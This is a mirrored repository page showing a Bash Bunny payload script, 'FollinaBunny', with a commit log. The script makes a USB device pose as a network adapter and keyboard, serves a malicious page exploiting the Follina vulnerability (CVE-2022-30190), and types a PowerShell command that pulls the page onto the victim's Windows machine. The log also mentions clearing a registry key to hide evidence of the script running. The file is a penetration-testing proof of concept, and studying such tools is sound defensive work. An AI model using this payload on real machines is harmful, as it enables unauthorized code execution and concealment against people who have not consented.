hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
98bfe076031d76db9fbc4e9b4edb9afa2c869da2
bashbunny-payloads/payloads/library/execution/FollinaBunny/payload.txt
panicacid 980debd8c0 Created FollinaBunny a PoC payload that leverages CVE-2022-30190 (#530) 
* New Payload

Added new PrintNightmare Payload (Quick and dirty)

* Fixed my potty mouth

I'm a child sometimes

* Renamed Payload

* PrintNightmare: Use SWITCH_POSITION in payload path

* Fixing a typo

* Added Delays

Added some delays due to the fact that it was inconsistently reliable, occasionally it'd half type out the command. The delays have resolved the consistency issue on my end. Feel free to tweak as required.

* Amending Version Number

I'm a fool

* Updated Readme with proper credit

* Housekeeping

Moved some of the QUACK Powershell commands into the juicybit.txt file for speed and ease of use.

* Update README.md

* More improvement

Added exit to the juicybits rather than using alt  and /noprofile to the run as

* Update README.md

* Pineapple-Connect-Windows New Payload For Connecting Client To Pineapple AP / Any AP

Pineapple-Connect-Windows new Bashbunny payload for connecting target machine quickly and efficiently to your Pineapple AP or an AP of your choosing (and control!)

* Changed from RUN WIN to QUACK STRING

Changed from RUN WIN to QUACK STRING as I was having issues with the formatting, presume it needs wrapping in quotes or something but it just kept breaking. QUACK STRING works fine so meh

* Added command to cover traks at the end of the script

added a line of powershell to clean out the run registry key to hide any evidence of the script running

* Added FollinaBunny

Added a new payload which leverages CVE-2022-30190 to execute code based on a malicious website hosted on the bunny itself.

Co-authored-by: Marc <foxtrot@malloc.me>
Co-authored-by: Marc <foxtrot@realloc.me>
2022-06-01 12:05:20 -05:00

38 lines
1.3 KiB
Bash
Raw Blame History

#!/bin/bash
# Title: PoC Follina Execution via BashBunny
# Description: Serves up a malicious website that leverages the current CVE-2022-30190 aka Follina
# Author: PanicAcid
# Version: 1.0
# Category: Execution
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
# Props: Based on Cribbit's Moo payload https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/prank/Win_PoSH_AnsiSebsCow
# Example payload taken from https://greynolds.me.uk/ - https://greynolds.me.uk/poc.html
# Notes: This WILL flag on Defender if you're up to date, however the PoC here isn't that you can just run this code, it's that you can self serve
# this malicious html file via the BashBunny and you can tweak it to your hearts content.
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN powershell.exe "wget http://$HOST_IP/payload.html"
QUACK DELAY 500
LED FINISH
Reference in New Issue View Git Blame Copy Permalink